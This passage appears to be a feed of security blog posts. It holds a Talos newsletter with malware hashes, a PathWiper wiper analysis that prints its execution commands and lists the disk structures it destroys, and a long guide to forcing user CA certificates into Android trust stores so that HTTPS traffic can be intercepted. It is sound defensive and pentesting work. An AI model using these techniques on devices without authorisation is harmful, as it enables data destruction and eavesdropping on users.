Normal view

Received before yesterday

Solo: A Pixel 6 Pro Story (When one bug is all you need)

5 June 2025 at 00:00
During my internship I was tasked to analyze a Mali GPU exploit on Pixel 7/8 devices and adapt it to make it work on another device: the Pixel 6 Pro. While the exploit process itself is relatively straightforward to reproduce (in theory we just need to find the correct symbol offsets and signatures for our target device), what’s interesting about Pixel 6 Pro is that it uses a different Mali GPU from the Pixel 7/8, which lacked support for a feature that one of the two vulnerabilities within the exploit relied on:

Everyone's on the cyber target list

5 June 2025 at 18:00
Everyone's on the cyber target list

Welcome to this week’s edition of the Threat Source newsletter. 

I’ve discovered that being a rent guarantor for someone is an involved experience. While I’m glad that I can help out a loved one secure a better rental property, the process of verifying my identity and ability to cover any missed payments required handing over far more personal and financial data than I was comfortable with. 

I asked the agent about their information security policies and cybersecurity posture. I was relieved to hear that they delete all the personal data within two weeks of processing, but I was concerned that the person dealing with my dossier didn’t think that they were at risk of a cyber attack. They believed that because they had a low online profile and their organisation was small, they didn’t present as a target. 

Not wanting to jeopardise my position as a guarantor, I didn’t argue further beyond offering a few words of advice. The truth is that everyone is a target. Many criminals do not discriminate; they seek to compromise anyone and see how they can make money from a compromise once access is achieved. Sophisticated criminals research their targets and their wider ecosystem of suppliers and partners in depth to identify potential weak points. It only takes a moment’s inattention for anyone to fall for a phishing or social engineering scam. 

Cybersecurity training needs to reinforce the fact that anyone can be a victim of a cyber attack. No matter how careful you might be, how insignificant you think that you might be, an attack can still catch you off guard. The good news is that by ensuring basic cyber hygiene, we can make a lot of progress towards preventing harm. 

Impressing on users the need to install updates promptly, the importance of having end-point protection and using multi-factor authentication is not a panacea, but it is a basic foundation upon which more advanced protection can be built. 

Good cybersecurity begins with an awareness of the threat, an acknowledgement that we are all at risk, and knowing the potential consequences. Nobody is too insignificant, too small or too well hidden to escape the risk of cyber attack. Suitable protection follows from reflecting on what is at risk and what could possibly go wrong.

The one big thing 

Talos has uncovered a destructive attack on Ukrainian critical infrastructure involving a new wiper malware, "PathWiper," deployed through a legitimate endpoint administration framework. Talos attributes this attack to a Russia-linked APT actor, underscoring the persistent threat to Ukraine's infrastructure amid the ongoing war. 

Why do I care? 

This attack highlights the sophisticated tactics of state-sponsored threat actors and the risks critical infrastructure entities face, which could have global implications for cybersecurity and geopolitical stability. 

So now what? 

Organizations, particularly those managing critical infrastructure, should strengthen their endpoint security, monitor for unusual administrative activity, and stay informed on evolving threats to mitigate potential risks.

Top security headlines of the week

New Chrome Zero-Day Actively Exploited; Google Issues Emergency Out-of-Band Patch 
The high-severity flaw is being tracked as CVE-2025-5419 (CVSS score: 8.8), and has been flagged as an out-of-bounds read and write vulnerability in the V8 JavaScript and WebAssembly engine. (The Hacker News

Vanta bug exposed customers’ data to other customers 
Compliance company Vanta has confirmed that a bug exposed the private data of some of its customers to other Vanta customers. The company told TechCrunch that the data exposure was a result of a product code change and not caused by an intrusion. (TechCrunch

Data Breach Affects 38K UChicago Medicine Patients 
UChicago Medicine released a statement that the data of 38K patients may have been exposed by a third-party debt collector's system breach. The exposed data may include SSNs, addresses, dates of birth, medical information, and financial account information. (UPI)

Can’t get enough Talos? 

Fake AI installers target businesses. Catch up on the ransomware and malware threats Talos discovered circulating in the wild and masquerading as legit AI tool installers. Read the blog or listen to our most recent Talos Takes to hear Hazel and Chetan, the author, discuss the blog more in-depth.

Talos at Cisco Live 2025. From sessions featuring a live IR tabletop session to learning how to outsmart identity attacks, there’s plenty of Talos to keep you going in San Diego next week. Browse sessions Talos is participating in, and we'll see you there!

Upcoming events where you can find Talos 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91   
MD5: 7bdbd180c081fa63ca94f9c22c457376   
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details  
Typical Filename: IMG001.exe  
Detection Name: Simple_Custom_Detection 

SHA 256: 
9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
MD5: 2915b3f8b703eb744fc54c81f4a9c67f 
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
Typical Filename: VID001.exe 
Detection Name: Simple_Custom_Detection 

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0 
MD5: 8c69830a50fb85d8a794fa46643493b2  
Typical Filename: AAct.exe  
Claimed Product: N/A  
Detection Name: PUA.Win.Dropper.Generic::1201 

Newly identified wiper malware “PathWiper” targets critical infrastructure in Ukraine

5 June 2025 at 10:00
  • Cisco Talos observed a destructive attack on a critical infrastructure entity within Ukraine, using a previously unknown wiper we are calling “PathWiper”. 
  • The attack was instrumented via a legitimate endpoint administration framework, indicating that the attackers likely had access to the administrative console, that was then used to issue malicious commands and deploy PathWiper across connected endpoints. 
  • Talos attributes this disruptive attack and the associated wiper to a Russia-nexus advanced persistent threat (APT) actor. Our assessment is made with high confidence based on tactics, techniques and procedures (TTPs) and wiper capabilities overlapping with destructive malware previously seen targeting Ukrainian entities.  
  • The continued evolution of wiper malware variants highlights the ongoing threat to Ukrainian critical infrastructure despite the longevity of the Russia-Ukraine war. 

Proliferation of PathWiper 

Newly identified wiper malware “PathWiper” targets critical infrastructure in Ukraine

Any commands issued by the administrative tool’s console were received by its client running on the endpoints. The client then executed the command as a batch (BAT) file, with the command line partially resembling that of Impacket command executions, though such commands do not necessarily indicate the presence of Impacket in an environment.

The BAT file consisted of a command to execute a malicious VBScript file called ‘uacinstall.vbs’, also pushed to the endpoint by the administrative console: 

C:\WINDOWS\System32\WScript.exe C:\WINDOWS\TEMP\uacinstall.vbs

Upon execution, the VBScript wrote the PathWiper executable, named ‘sha256sum.exe’, to disk and executed it: 

C:\WINDOWS\TEMP\sha256sum.exe 

Throughout the course of the attack, filenames and actions used were intended to mimic those deployed by the administrative utility’s console, indicating that the attackers had prior knowledge of the console and possibly its functionality within the victim enterprise’s environment.

PathWiper capabilities 

On execution, PathWiper replaces the contents of artifacts related to the file system with random data generated on the fly. It first gathers a list of connected storage media on the endpoint, including: 

  • Physical drive names 
  • Volume names and paths 
  • Network shared and unshared (removed) drive paths 

Although most storage devices and volumes are discovered programmatically (via APIs), the wiper also queries ‘HKEY_USERS\Network\<drive_letter>| RemovePath’ to obtain the path of shared network drives for destruction. 

Once all the storage media information has been collected, PathWiper creates one thread per drive and volume for every path recorded and overwrites artifacts with randomly generated bytes. The wiper reads multiple file systems attributes, such as the following from New Technology File System (NTFS). PathWiper then overwrites the contents/data related to these artifacts directly on disk with random data: 

  • MBR 
  • $MFT 
  • $MFTMirr 
  • $LogFile 
  • $Boot 
  • $Bitmap 
  • $TxfLog 
  • $Tops 
  • $AttrDef 

Before overwriting the contents of the artifacts, the wiper also attempts to dismount volumes using the ‘FSCTL_DISMOUNT_VOLUME IOCTL’ to the MountPointManager device object. PathWiper also destroys files on disk by overwriting them with randomized bytes. 

PathWiper’s mechanisms are somewhat semantically similar to another wiper family, HermeticWiper, previously seen targeting Ukrainian entities in 2022. HermeticWiper, also known as FoxBlade or NEARMISS, is attributed to Russia’s Sandworm group in third-party reporting with medium to high confidence. Both wipers attempt to corrupt the master boot record (MBR) and NTFS-related artifacts.  

 A significant difference between HermeticWiper and PathWiper is the corruption mechanisms used against recorded drives and volumes. PathWiper programmatically identifies all connected (including dismounted) drives and volumes on the system, identifies volume labels for verification and documents valid records. This differs from HermeticWiper's simple process of enumerating physical drives from 0 to 100 and attempting to corrupt them. 

Coverage 

Newly identified wiper malware “PathWiper” targets critical infrastructure in Ukraine

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org

Snort 2 rules: 64742, 64743 

Snort 3 rules: 301174

Indicators of compromise (IOCs) 

7C792A2B005B240D30A6E22EF98B991744856F9AB55C74DF220F32FE0D00B6B3

SonicDoor – Cracking SonicWall’s SMA 500

4 June 2025 at 09:36
While attempting to compare the security level of various VPN vendors, I kept falling down the path of searching for vulnerabilities instead. This blog post details the ones I discovered in SonicWall’s SMA 500, which were patched in December 2024. This post has been delayed to coincide with my talk at SecurityFest on this exact … Continue reading SonicDoor – Cracking SonicWall’s SMA 500

Intercepting traffic on Android with Mainline and Conscrypt

5 June 2025 at 07:00

TL;DR: The AlwaysTrustUserCerts module now supports Android 7 until Android 16 Beta. If you want to learn more about Mainline, Conscrypt and how everything works together, keep reading!

Intro

To properly test the backend of any mobile application, we need to intercept (and modify) the API traffic. We could use Swagger or Postman files if they are available, but it’s a lot easier to intercept real traffic so we don’t have to worry about providing correct values, sequencing, etc.

Sometimes intercepting traffic is very straightforward: You configure a device proxy, install your proxy certificate on the device and you’re good to go. This was even the default behavior until Android stopped trusting user certificates by default. On recent versions of Android, this will only work if the network security config has been modified to include user certificates, or if the user certificate has been moved into the system certificate repository.

Android 14 (A14) made interception a bit more difficult by moving all root certificates to a Mainline module, as I’ll explain below. Recently though, one of our devices was showing the same behavior, even on A13. While I was surprised initially, it actually makes a lot of sense. Let’s dive in!

Android’s Conscrypt module and Mainline

The Conscrypt module, which was introduced in Android 9, is used by the Android OS to verify the TLS certificates of HTTPS connections. It contains Conscrypt itself in the form of a Java security provider, and the BoringSSL library, Google’s Fork of OpenSSL. Conscrypt is still the default security provider on Android 15 (A15).

In Android 10, Google introduced Mainline, which is a way for Google to update certain parts of the Android OS without requiring an over-the-air (OTA) update. These updates are installed via the Google Play Services app and require an onboarded Google Play app. Since these Mainline updates are completely separated from system updates, even devices that no longer receive official OS updates can still receive security updates for selected components. Since the introduction in Android 10, many modules have been merged into Mainline, currently bringing the total to 33 modules for A15.

As a result, devices typically have two update levels:

  • Android Security Update (ASU): Delivered as OTA updates by the OEM
  • Google Play System Update (GPSU): Delivered by Google via Google Play
An Android 13 (A13) device with two patch levels: The Android Security Update (ASU) level and the Google Play System Update (GPSU) level

Internally, Mainline modules are located in the /apex/ folder and can be viewed with root permissions. On a fresh Android 13 (A13) installation (UP1A.231005.007), the /apex/ folder might look as follows:

$ ls -lh /apex
total 256K
-rw-r--r--  1 root   system  11K 2025-05-12 17:20 apex-info-list.xml
drwxr-xr-x  7 system system 4.0K 1970-01-01 01:00 com.android.adbd
drwxr-xr-x  7 system system 4.0K 1970-01-01 01:00 com.android.adbd@331314022
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 com.android.adservices
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 com.android.adservices@331418080
drwxr-xr-x  6 system system 4.0K 1970-01-01 01:00 com.android.apex.cts.shim
drwxr-xr-x  6 system system 4.0K 1970-01-01 01:00 com.android.apex.cts.shim@1
drwxr-xr-x  6 system system 4.0K 1970-01-01 01:00 com.android.appsearch
drwxr-xr-x  6 system system 4.0K 1970-01-01 01:00 com.android.appsearch@331311000
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 com.android.art
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 com.android.art@331413030
drwxr-xr-x  7 system system 4.0K 1970-01-01 01:00 com.android.btservices
drwxr-xr-x  7 system system 4.0K 1970-01-01 01:00 com.android.btservices@331716000
drwxr-xr-x  5 system system 4.0K 1970-01-01 01:00 com.android.cellbroadcast
drwxr-xr-x  5 system system 4.0K 1970-01-01 01:00 com.android.cellbroadcast@331411000
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 com.android.compos
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 com.android.compos@1
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 com.android.conscrypt
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 com.android.conscrypt@331411000
Bash

The apex-info-list.xml contains an overview of the installed modules. For example, for com.android.conscrypt we have the following element:

<?xml version="1.0" encoding="utf-8"?>
<apex-info-list>
...
<apex-info
   moduleName="com.android.conscrypt"
   modulePath="/data/apex/decompressed/[email protected]"
   preinstalledModulePath="/system/apex/com.google.android.conscrypt.apex"
   versionCode="331411000"
   versionName=""
   isFactory="true"
   isActive="true"
   lastUpdateMillis="1747063014"
   provideSharedApexLibs="false"
/>
...
</apex-info-list>
XML

The Conscript module itself contains some metadata, the BoringSSL library, and the Conscrypt security provider:

$ ls -lah /apex/com.android.conscrypt
total 48K
drwxr-xr-x  8 system system 4.0K 1970-01-01 01:00 .
drwxr-xr-x 64 root   root   1.3K 2025-05-12 11:37 ..
-rw-r--r--  1 system system   61 1970-01-01 01:00 apex_manifest.json
-rw-r--r--  1 system system  103 1970-01-01 01:00 apex_manifest.pb
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 bin
drwxr-xr-x  3 root   shell  4.0K 1970-01-01 01:00 etc
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 javalib
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 lib
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 lib64
drwx------  2 root   root    16K 1970-01-01 01:00 lost+found  
Bash

Android 14 (A14): Updatable root certificate authorities

When Android validates a TLS certificate chain, it does so using a collection of root certificate authorities. All versions of Android have the /system/etc/security/cacerts folder:

$ ls /system/etc/security/cacerts
00673b5b.0  35105088.0  5e4e69e7.0  88950faa.0  b0f3e76e.0  d16a5865.0
04f60c28.0  399e7759.0  5f47b495.0  89c02a45.0  b3fb433b.0  d18e9066.0
0d69c7e1.0  3a3b02ce.0  60afe812.0  8d6437c3.0  b74d2bd5.0  d41b5e2a.0
10531352.0  3ad48a91.0  6187b673.0  91739615.0  b7db1890.0  d4c339cb.0
111e6273.0  3c58f906.0  63a2c897.0  9282e51c.0  b872f2b4.0  d59297b8.0
12d55845.0  3c6676aa.0  67495436.0  9339512a.0  b936d1c6.0  d7746a63.0
1dcd6f4c.0  3c860d51.0  69105f4f.0  9479c8c3.0  bc3f2570.0  da7377f6.0
1df5a75f.0  3c899c73.0  6b03dec0.0  9576d26b.0  bd43e1dd.0  dbc54cab.0
1e1eab7c.0  3c9a4d3b.0  75680d2e.0  95aff9e3.0  bdacca6f.0  dbff3a01.0
1e8e7201.0  3d441de8.0  76579174.0  9685a493.0  bf64f35b.0  dc99f41e.0
1eb37bdf.0  3e7271e8.0  7892ad52.0  9772ca32.0  c2c1704e.0  dfc0fe80.0
1f58a078.0  40dc992e.0  7999be0d.0  985c1f52.0  c491639e.0  e442e424.0
219d9499.0  455f1b52.0  7a7c655d.0  9d6523ce.0  c51c224c.0  e48193cf.0
23f4c490.0  48a195d8.0  7a819ef2.0  9f533518.0  c559d742.0  e775ed2d.0
27af790d.0  4be590e0.0  7c302982.0  a2c66da8.0  c7e2a638.0  e8651083.0
2add47b6.0  5046c355.0  7d453d8f.0  a3896b44.0  c907e29b.0  ed39abd0.0
2d9dafe4.0  524d9b43.0  81b9768f.0  a7605362.0  c90bc37d.0  f013ecaf.0
2fa87019.0  52b525c7.0  82223c44.0  a7d2cf64.0  cb156124.0  f0cd152c.0
302904dd.0  583d0756.0  85cde254.0  a81e292b.0  cb1c3204.0  f459871d.0
304d27c3.0  5a250ea7.0  86212b19.0  ab5346f4.0  ccc52f49.0  facacbc6.0
31188b5e.0  5a3f0ff8.0  869fbf79.0  ab59055e.0  cf701eeb.0  fb5fa911.0
33ee480d.0  5acf816d.0  87753b0d.0  aeb67534.0  d06393bb.0  fd08c599.0
343eb6cb.0  5cf9d536.0  882de061.0  b0ed035a.0  d0cddf45.0  fde84897.0
Bash

However, with A14, Google started including a cacerts folder inside of the /apex/com.android.conscrypt/ package, too:

$ ls -l /apex/com.android.conscrypt/
-rw-r--r-- 1 system system   103 1970-01-01 01:00 apex_manifest.pb
drwxr-xr-x 2 root   shell   4096 1970-01-01 01:00 bin
drwxr-xr-x 2 root   shell   4096 1970-01-01 01:00 cacerts
drwxr-xr-x 3 root   shell   4096 1970-01-01 01:00 etc
drwxr-xr-x 2 root   shell   4096 1970-01-01 01:00 javalib
drwxr-xr-x 2 root   shell   4096 1970-01-01 01:00 lib64
drwx------ 2 root   root   16384 1970-01-01 01:00 lost+found
Bash

The original certificates on /system are still available, but they are only used as a fallback; if the cacerts folder is available via conscrypt, it will get priority over the ones stored at /system/etc/security/cacerts. The code below, taken from /apex/com.android.conscrypt/javalib/conscrypt.jar, shows this behavior. Note that this snippet also hints at a potential alternative way to disable apex certificate management via the system.certs.enabled property:

static {
    String ANDROID_ROOT = System.getenv("ANDROID_ROOT");
    String ANDROID_DATA = System.getenv("ANDROID_DATA");
    File updatableDir = new File("/apex/com.android.conscrypt/cacerts");
    if (System.getProperty("system.certs.enabled") != null && System.getProperty("system.certs.enabled").equals("true")) {
        defaultCaCertsSystemDir = new File(ANDROID_ROOT + "/etc/security/cacerts");
    } else if (updatableDir.exists() && updatableDir.list().length != 0) {
        defaultCaCertsSystemDir = updatableDir;
    } else {
        defaultCaCertsSystemDir = new File(ANDROID_ROOT + "/etc/security/cacerts");
    }
    TrustedCertificateStore.setDefaultUserDirectory(new File(ANDROID_DATA + "/misc/keychain"));
}
Java

So we could enable this system property and be done with it, but there are actually a few issues:

  • Setting this property with setprop/resetprop won’t work; The properties managed by these tools are a different set of properties than the one you get from System.getProperty
  • Google may modify this behavior in the future, so it’s not very future-proof
  • Injecting the property into the Dalvik VM may be detected by RASP

The AlwaysTrustUserCerts module currently only copies user certificates into the /system/ directory, which was enough until now. By adding the certificates before Zygote is initialized, the certificates automatically propagate to all apps when they are forked from Zygote. To make the module work with A14, we want to still copy the user certs into /system/, but also make sure that they are added to the /apex/ directory.

Unfortunately, adding certificates to the /apex/ folder is more complicated, as documented by Tim Perry on the httptoolkit blog: Any changes we make here will not automatically propagate to new applications, due to the way each app’s /apex folder is mounted.

As suggested in the httptoolkit blogpost, there are a few potential solutions, some of which require iteratively going into every process and updating the mounts to pick up our changes. To make sure the update covers both /system and /apex certificates, the module now does the following:

  1. Collect all user and /system certs and copy them into $MODULE/system/etc/security/cacerts
  2. Magisk/KernelSU will automatically overlay this onto the original /system/etc/security/cacerts folder
  3. Wait for zygote to become available and mount /system/etc/security/cacerts onto /apex/com.android.conscrypt/cacerts in zygote and all its children
  4. Monitor zygote to make sure the mount is still there. When zygote crashes, the mount disappears and we need to inject it again

Step 3 is required because even though zygote will see the newly mounted certificates, the mount will not propagate to its children since the /apex/ is specifically mounted with PRIVATE propagation.

It took a bit of work, but AlwaysTrustUserCerts now allows you to fully intercept HTTPS traffic on A14 🥳.

What about older versions?

A14 comes with Mainline-updatable root-CAs out of the box. But …the whole idea of Mainline is to bring important security updates to devices without requiring a full OTA update. Managing root certificate authorities definitely is a security-critical service, and since Conscrypt is part of Mainline, these updates can be made available to pre-A14 devices, too!

A commit from December 2022 mentions the inclusion of CA certificates in apex:

Add conscrypt updatable certificates.

This cl adds the new blueprint files required for certificate loading, and an additional ca_certificates_apex build rule used to create the prebuild modules for loading certificates. While we are currently have to out all certificates within Conscrypt's apex build rules, we intend to later avoid that step.

But which devices will get this specific update? This question is answered a few commits later, when the minSDK is set to 30 (A11):

Merge "Add minSdkVersion="30" to Conscrypt APEX" into main

It’s currently still at this value, so let’s do a quick test and flash A11.0.0 (RP1A.200720.009, Sep 2020) to my Pixel 3a device. After the initial installation, we have version 300900703 which does not have a cacerts folder yet:

$ ls -lh com.android.conscrypt@300900703/
total 22K
-rw-r--r-- 1 system system   62 1970-01-01 01:00 apex_manifest.json
-rw-r--r-- 1 system system   85 1970-01-01 01:00 apex_manifest.pb
drwxr-xr-x 2 root   shell  4.0K 1970-01-01 01:00 bin
drwxr-xr-x 2 root   shell  4.0K 1970-01-01 01:00 etc
drwxr-xr-x 2 root   shell  4.0K 1970-01-01 01:00 javalib
drwxr-xr-x 2 root   shell  4.0K 1970-01-01 01:00 lib
drwxr-xr-x 2 root   shell  4.0K 1970-01-01 01:00 lib64
drwx------ 2 root   root    16K 1970-01-01 01:00 lost+found
Bash

Unfortunately, try as a I might, I couldn’t trigger a GPSU. After doing some research, it seems that multiple users have this issue, and the suggested fix is to update to A12. So let’s give that a try and install SP1A.210812.015, the first available A12 version for Pixel 3a:

# SP1A.210812.015 - pre update
sargo:/apex/com.android.conscrypt@310727000 # ls -l
total 44
-rw-r--r-- 1 system system    62 1970-01-01 01:00 apex_manifest.json
-rw-r--r-- 1 system system   103 1970-01-01 01:00 apex_manifest.pb
drwxr-xr-x 2 root   shell   4096 1970-01-01 01:00 bin
drwxr-xr-x 3 root   shell   4096 1970-01-01 01:00 etc
drwxr-xr-x 2 root   shell   4096 1970-01-01 01:00 javalib
drwxr-xr-x 2 root   shell   4096 1970-01-01 01:00 lib
drwxr-xr-x 2 root   shell   4096 1970-01-01 01:00 lib64
drwx------ 2 root   root   16384 1970-01-01 01:00 lost+found
Bash

Luckily this time we do get an update after refreshing the update window a few times (April 1st 2025) and the cacerts folder is now available:

# SP1A.210812.015 - post update (April 1st 2025 update)
sargo:/apex/com.android.conscrypt@351412000 # ls -lah
total 48K
drwxr-xr-x  9 system system 4.0K 1970-01-01 01:00 .
drwxr-xr-x 55 root   root   1.1K 2025-05-13 09:59 ..
-rw-r--r--  1 system system  103 1970-01-01 01:00 apex_manifest.pb
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 bin
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 cacerts
drwxr-xr-x  3 root   shell  4.0K 1970-01-01 01:00 etc
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 javalib
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 lib
drwxr-xr-x  2 root   shell  4.0K 1970-01-01 01:00 lib64
drwx------  2 root   root    16K 1970-01-01 01:00 lost+found
Bash

This means that, depending on your GPSU level, your device may or may not use apex-based certificates starting as early as A12. Other devices may still get GPSUs on A11 though, so let’s dig a bit deeper. (Note: At the time of writing, only A14+ devices will use the apex certificates, as explained down below)

Backporting to Android 11 (A11)

My Pixel 3a doesn’t get a GPSU on A11, but it does already have a conscrypt APEX folder installed. Since the conscrypt module supports A11, we should be able to install the newer conscrypt version on our A11 installation, as long as we can find the correct apex file. Apex files shouldn’t be device-specific (that would defeat the entire point) so why don’t we just pull it from the A12 version and install it on A11?

Extracting the apex is actually straightforward, as it’s stored on-disk in /data/apex/active/:

$ adb pull /data/apex/active/[email protected]
/data/apex/active/[email protected]: 1 file pulled, 0 skipped. 31.9 MB/s (7237632 bytes in 0.216s)
Bash

Next, let’s flash RQ3A.211001.001 (A11) and install the apex file. Installation should be as easy as installing an APK:

$ adb install [email protected]
Failure [INSTALL_FAILED_DUPLICATE_PACKAGE: Scanning Failed.: com.google.android.conscrypt is an APEX package and can't be installed as an APK.]
Bash

Weird. A different documentation page suggests using –staged while installing, which does work:

$ adb install --staged [email protected]
Performing Streamed Install
Success. Reboot device to apply staged session
Bash

Finally, after rebooting, we do see our newly installed conscrypt version:

$ ls /apex/com.android.conscrypt@351412000
apex_manifest.pb  bin  cacerts  etc  javalib  lib  lib64  lost+found
Bash

Success! Since the signature is valid, the APEX module is loaded and the device now has apex-based CAs! However, after some testing, it turns out that even though the folder is available, the system still falls back to the old /system location. At some point, Google updated the initialization logic to also check the current SDK version. This logic is currently also included in the latest installable Conscrypt version via Mainline:

static {
    String ANDROID_ROOT = System.getenv("ANDROID_ROOT");
    String ANDROID_DATA = System.getenv("ANDROID_DATA");
    File updatableDir = new File("/apex/com.android.conscrypt/cacerts");
    if (shouldUseApex(updatableDir)) {
        defaultCaCertsSystemDir = updatableDir;
    } else {
        defaultCaCertsSystemDir = new File(ANDROID_ROOT + "/etc/security/cacerts");
    }
    TrustedCertificateStore.setDefaultUserDirectory(new File(ANDROID_DATA + "/misc/keychain"));
}

static boolean shouldUseApex(File updatableDir) {
    Object sdkVersion = getSdkVersion();
    if (sdkVersion == null || ((Integer) sdkVersion).intValue() < 34) {
        return false;
    }
    if ((System.getProperty("system.certs.enabled") != null && System.getProperty("system.certs.enabled").equals("true")) || !updatableDir.exists() || ArrayUtils.isEmpty(updatableDir.list())) {
        return false;
    }
    return true;
}
Java

So even though the cacerts folder exists via APEX, it won’t be used on anything below A14. That being said, it’s not unthinkable that this logic could be changed in the future. If a root certificate is ever compromised (e.g. like the DigiNotar hack), Google could actually remove the compromised certificate from all Mainline-enabled devices!

In the intro, I mentioned that we did see this behavior on A13. Unfortunately, I could not confirm this, since the device had since received the latest mainline update and it’s not straightforward to collect previous versions of a specific Mainline module. Traffic interception did work after manually mounting the certificate into /apex/ though.

As a final step, let’s clean up and remove the APEX module again. Even though the module is called com.android.conscrypt, it’s not the correct package name to uninstall it:

$ adb uninstall com.android.conscrypt
Failure [DELETE_FAILED_INTERNAL_ERROR]
Bash

The correct package name is actually contained within the APEX file we installed earlier, which is com.google.android.conscrypt. Why a different package name? 🤷‍♂️

$ adb -d uninstall com.google.android.conscrypt
Success
$ ls /apex/com.android.conscrypt/
apex_manifest.json  apex_manifest.pb  bin  etc  javalib  lib  lib64  lost+found
Bash

But wait, there’s more (Android 15+)

On A15, something weird happens. After installing the AlwaysTrustUser certs module, all of the certificates have disappeared:

Normal list of certificates on the left, an empty list on the right.

It took me a while to figure this out, but luckily the fix is really simple. The problem is two-fold:

  1. I was mounting /system/etc/security/cacert onto /apex/com.android.conscrypt/cacerts
  2. With A15, each certificate in /system/etc/security/cacerts is actually a mount itself:
 $ mount | grep cert
/dev/block/dm-7 on /system/etc/security/otacerts.zip type ext4 (ro,seclabel,noatime)
/dev/block/dm-7 on /system/etc/security/cacerts/bf64f35b.0 type ext4 (ro,seclabel,noatime)
/dev/block/dm-7 on /system/etc/security/cacerts/5acf816d.0 type ext4 (ro,seclabel,noatime)
/dev/block/dm-7 on /system/etc/security/cacerts/d41b5e2a.0 type ext4 (ro,seclabel,noatime)
/dev/block/dm-7 on /system/etc/security/cacerts/33ee480d.0 type ext4 (ro,seclabel,noatime)
...
Bash

So why have the certificates disappeared? Well, the module collects all the certificates into $MODDIR/system/etc/security/cacerts which is then automatically overlayed onto the real /system/etc/security/cacerts location.

Then, the /system/etc/security/cacerts folder is bind-mounted into each process which should make the contents of the folder available. Since every file inside of /system/etc/security/cacerts is now also a mount, these mounts are not automatically propagated. The fix? Use --rbind instead of --bind when entering the process:

# Wrong
/system/bin/nsenter --mount=/proc/$zp/ns/mnt -- /bin/mount --bind $SYS_CERT_DIR $APEX_CERT_DIR

# Correct
/system/bin/nsenter --mount=/proc/$zp/ns/mnt -- /bin/mount --rbind $SYS_CERT_DIR $APEX_CERT_DIR
Bash

With all of these complex mounts, I was surprised to see that disabling root CAs from the settings still worked without any issues. Digging a bit deeper into the implementation, it turns out that root certificates are not removed, but rather copied to the /data/misc/user/0/cacerts-removed directory when they are disabled in the settings application:

// conscrypt.jar - com.android.org.conscrypt.TrustedCertificateStore
public void deleteCertificateEntry(String alias) throws IOException, CertificateException {
        File file;
        if (alias == null || (file = fileForAlias(alias)) == null) {
            return;
        }
        if (isSystem(alias)) {
            X509Certificate cert = readCertificate(file);
            if (cert == null) {
                return;
            }
            // deleteDir = /data/misc/user/0/cacerts-removed/
            File deleted = getCertificateFile(this.deletedDir, cert);
            if (deleted.exists()) {
                return;
            }
            writeCertificate(deleted, cert);
            return;
        }
        if (isUser(alias)) {
            new FileOutputStream(file).close();
            removeUnnecessaryTombstones(alias);
        }
    }
Java

When the TrustedCertificateStore later looks for the correct root CA, it checks if the identified root CA is available in the cacerts-removed directory and ignores it if it is:

// conscrypt.jar - com.android.org.conscrypt.TrustedCertificateStore
@Override public X509Certificate getTrustAnchor(final X509Certificate c) {
    CertSelector selector = new CertSelector(this) { // from class: com.android.org.conscrypt.TrustedCertificateStore.2
        @Override // com.android.org.conscrypt.TrustedCertificateStore.CertSelector
        public boolean match(X509Certificate ca) {
            return ca.getPublicKey().equals(c.getPublicKey());
        }
    };
    X509Certificate user = (X509Certificate) findCert(this.addedDir, c.getSubjectX500Principal(), selector, X509Certificate.class);
    if (user != null) {
        return user;
    }
    X509Certificate system = (X509Certificate) findCert(this.systemDir, c.getSubjectX500Principal(), selector, X509Certificate.class);
    if (system != null && !isDeletedSystemCertificate(system)) {
        return system;
    }
    return null;
}
public boolean isDeletedSystemCertificate(X509Certificate x) {
    return getCertificateFile(this.deletedDir, x).exists();
}
Java

Final solution

It took quite some troubleshooting and testing, but my Magisk module has now been updated to cover all (🤞) situations, ranging from Android 7 until Android 16 Beta. Some of the features:

